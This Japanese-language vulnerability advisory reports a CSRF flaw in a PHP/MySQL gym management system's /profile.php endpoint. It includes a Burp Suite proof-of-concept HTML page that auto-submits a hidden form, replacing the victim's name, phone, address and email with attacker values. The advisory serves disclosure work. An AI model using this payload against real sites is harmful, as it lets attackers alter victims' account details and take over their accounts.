
PHPとMYSQLを使用したジム管理システム
PHPとMySQLを使用して構築されたジム管理システムです。
Shoaib Alam - LinkedInプロフィール
ジム管理システムに、クロスサイトリクエストフォージェリ(CSRF)の脆弱性が確認されました。この問題は、ユーザーパネルのプロフィール更新機能に存在します。
このアプリケーションには現在、Anti-CSRFトークンが実装されていないため、クロスサイトリクエストフォージェリ(CSRF)攻撃に対して脆弱です。このセキュリティ上の弱点は、特に /profile.php エンドポイントに影響します。攻撃者はこの欠陥を悪用して、住所、氏名、電話番号などの機密のユーザー情報を不正に変更することができます。これにより、ユーザーアカウントの整合性が損なわれ、さらなるセキュリティ問題を引き起こす可能性があります。
脆弱なエンドポイント: /profile.php
以下は、CSRFの脆弱性を示す概念実証です。このPoCは、Burp Suite Professionalを使用して生成されました。
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://localhost/gym/profile.php" method="POST">
<input type="hidden" name="fname" value="hacked" />
<input type="hidden" name="lname" value="victim" />
<input type="hidden" name="email" value="attacker@gmail.com" />
<input type="hidden" name="mobile" value="9999999999" />
<input type="hidden" name="state" value="hacked" />
<input type="hidden" name="city" value="hacked" />
<input type="hidden" name="address" value="hacked" />
<input type="hidden" name="submit" value="Update" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>